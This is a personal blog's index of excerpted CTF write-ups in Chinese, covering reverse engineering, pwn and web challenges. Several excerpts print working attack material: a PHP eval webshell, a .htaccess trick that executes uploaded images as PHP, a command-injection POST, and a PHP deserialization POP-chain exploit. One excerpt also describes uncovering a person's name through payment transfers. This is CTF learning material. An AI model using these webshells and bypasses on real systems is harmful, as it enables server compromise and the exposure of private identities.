【CTF】 Reverse 控制流平坦化学习 ichunqiu ezam

周六忘了比赛,晚上快六点才拿到题目,看了下感觉能做,研究了下,最后还是可惜,比赛结束了 拿到题目ida打开惯例看一下main 再看看汇编 基本上确定是ollvm了 下面那一堆整齐的是真实块,上面通过分发器跳转才到达真实块执行代码。看到群里有大佬直接通过动调跳转找代码的,那确实是真功夫...脚本小子直接拿deflat.py还原了。 建议放虚拟机里面,装GitHub页面推荐的angr版本 脚本还原之后的样子 这个时候f5已经可以看了 PART1 先看看第一部分的代码,前面到qmemcpy的代码是正常的分配内存和输入输出。后面进行了很长一堆的运算,其实都不用看,其实可以分析出来,前面都是静态的拿现有的进行操作,最后都给了v20,直接断在59行然后拿出v20就行了。 59行之后是一个flag格式比对,把flag里面的内容截取出来放到v22里面 PART2 我们先不看400670这个函数,先看看后面的东西,做游戏题比较多的应该很容易就能看出来这是个迷宫了,拿400670函数对flag内容处理后的数据逐位进行操作(也就是迷宫里面的上下左右)这边其实故意搞复杂了点,把上下弄成加减100,然后

CTF · 2022-05-09

【CTF】第四届浙江省大学生网络与信息安全竞赛预赛部分WP

W@v3s战队 一、战队信息 名称:W@v3s 排名:9 二、解题情况 粘贴解题图片 三、解题过程 Web 题目一名称 Checkin 直接访问 Burp抓包即可得到flag 关键步骤截图 题目二名称 pppop Pop链的exp: <?php class A1{ public $tmp1; public $tmp2; } class A3{ } class A4{ public $tmp1; } class A6{ public $tmp1; } class A8{ } $a1 = new A1(); $a3 = new A3(); $a4 = new A4(); $a6 = new A6(); $a8 = new A8(); $a1->tmp1=$a3; $a3->tmp2=$a4; $a4->tmp1=$a6; $a6->tmp1=$a8; echo urlencode(serialize($a1)); 这时候会执行echo new $this->tmp1($this->tmp2); 使用Glo

CTF · 2021-10-23

【CTF】某CTF比赛的一道pwn题

格式化字符串的一道题,整了一整天才弄明白,问了我哦等我哈了大佬和口那是二进制神。来复现一下 这个题目是这样的,看起来是不是很简单,确实,我刚开始学,啥也不是。 第一关 先康康前面七句 :Coolapk84: 这个属于是第一关了,格式化字符串改数值。要利用11行这个把v3改成12。 那么咋改呢,利用格式化字符串漏洞,由于这个题目限制输入比较严格,需要打开gdb来调试,看格式化字符串的偏移。 据二进制神称,我们需要用gdb把点断在call scanf后面一行,这里可以用disassemble vuln来看汇编: 可以看到 0x08048625 <+79>: call 0x8048490 <__isoc99_scanf@plt> 0x0804862a <+84>: add esp,0x10 复制2a这个地址,然后b *0x0804862a就可以断在这里了。然后r一下,随便输点什么让他读进去,回车,就断在这里了 然后输入stack 30 看看栈上,你刚刚输入的东西在什么位置 这里可以看到是在第0f个,所以偏移就是0

CTF · 2021-10-22

【CTF】ZJNU校内赛 Writeup by Xunflash

第一次参加的校赛 :Coolapk46: 要被锤爆了 好多大佬噢,还有个没进集训队的巨佬直接冲到第三,tql 这里是官方题目和wp https://github.com/A1natas/zjnuctf-school-contest-2021 下面是菜鸡wp请慢用 热身 网络安全法 直接搜网络安全法颁布日期 web web签到 Hackbar post system(“cat flag;”)即可 easy upload 上传.htaccess文件,内容为 <FilesMatch "evil.png"> SetHandler application/x-httpd-php </FilesMatch> burp抓包改文件类型为image/jpeg 然后上传 evil.png,内容为<?php eval($_POST[pass]);?> 蚁剑连接,密码为pass,根目录找到flag md5 Payload:?a1=QNKCDZO&a2=s878926199a&b1[]=111&b2[]=222 Post:cmd=system('c

CTF · 2021-05-10

【CTF】BUUCTF RE 刷(抄wp)题记录

:Coolapk140: 本篇可能会持续更新 PART1 RE11:Java逆向解密 这个是为数不多自己做的题 下载来是个.class文件,用jadx打开来是这个样子 看到26有一堆奇奇怪怪的,看着就像ascii的东西,有个加密函数 那么就写个解密脚本 key=[180, 136, 137, 147, 191, 137, 147, 191, 148, 136, 133, 191, 134, 140, 129, 135, 191, 65] flag='' for i in key: s=(i^32)-ord('@') flag+=chr(s) print flag 运行结果: flag:flag{This_is_theflag!} RE12:刮开有奖 [hidden]不会,还没写呢[/hidden] RE13:[GXYCTF2019]luck_guy 21.5.1 又被小端序这个东西坑了:在CTF中的小端序与大端序 下载文件出来 ida64拖进去打开 整个反编译出来逻辑还是比较清楚的,就是switch按照一定顺序执行,就会给flag 看了一下感觉有用的就1,4,5

CTF · 2021-04-01

【CTF】HECTF2020 Writeup by Xunflash

MISC png 下载图片发现是一张可爱猫咪图片,直接放到010editor里面,发现图片尾部有一段 base64M2I3OWJkZjhmY2ZkNTVmZH0=,拿去解码得到3b79bdf8fcfd55fd},后面好像没有什么东西了,然后尝试crc隐写。放入脚本解码得到原本的宽高为04 29修改后得到flag第一部分 不说人话 进去一看只有.!?三个字符,直接想到是Ook密码变形,然后打开记事本替换后解码即可 https://www.splitbrain.org/services/ook 【真签到题】快来看直播 进入直播间后flag就在上面 【The End】世界的终焉 明明是问卷,名字还这么高级 溯源!溯源!溯源! 这题真是。。一言难尽 多试了几次 第一题可以通过这个whois查询到邮箱https://www.whois365.com/cn/ 第二题查姓名第一个字是通过支付宝转账0.01之后可以直接通过银行app查看被转账人姓名 第三题姓名最后一个字直接进入支付宝转账界面看最后一个字 第四题百度电话号码,可以查到一个表单,里面包含南京雨花九如啥啥啥的养老院负责人电话,看了一下

CTF · 2020-12-09

【CTF】第12届极客大挑战GeekChallenge WEB部分Writeup by Xunflash

第一次参加这种比赛,写得很垃圾,200以上的都不会做。。。随便看看就好 :huaji13: 题目名称:Welcome 解题过程:打开发现405 ,百度搜索405发现需要使用post提交,burpsuite抓包改成post,forward,右键send to repeater 然后读一下代码发现 ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2']) 好怪啊这个东西,然后疯狂百度,搞了好久发现了这篇文章https://www.pianshen.com/article/732238291/ 里面说数组的sha1值相同,虽然不知道什么原理,但是直接用hackbar 在phpinfo界面找到auto_prepend_file ,后面有一个f1444aagggg.php,打开发现Not Found ,但是没有数据库信息和php信息,很怪,然后就不知道干啥,后来想着拿去burpsuite试一下查看源代码,然后就发现一行flag了 题目名称:朋友的学妹

CTF · 2020-11-20

【CTF】UNCTF Writeup by Satan9a

比赛:UNCTF2020校内赛 ID:Satan9a xuxuan AN_666 Xunflash Web 1.easy_ssrf 2.俄罗斯方块人大战奥特曼 查看源代码,发现有一个压缩包 下载下来 发现有 打开即可得到flag 3.easy_upload 解题过程: 上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容 plain AddType application/x-httpd-p\ hp .jpg 上传hp.jpg 内容 plain <?=eval($_POST[satan]); 连接蚁剑得到flag 4.easyunserialize 解题过程: 反序列化字符串逃逸,构造payload plain challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;; 得出flag 5.ezphp 解题过程: 原题,构造payload plain data=a:2

CTF · 2020-11-15
2020 - 2023 Xunflash的小站. All Rights Reserved.
Theme Jasmine by Kent Liao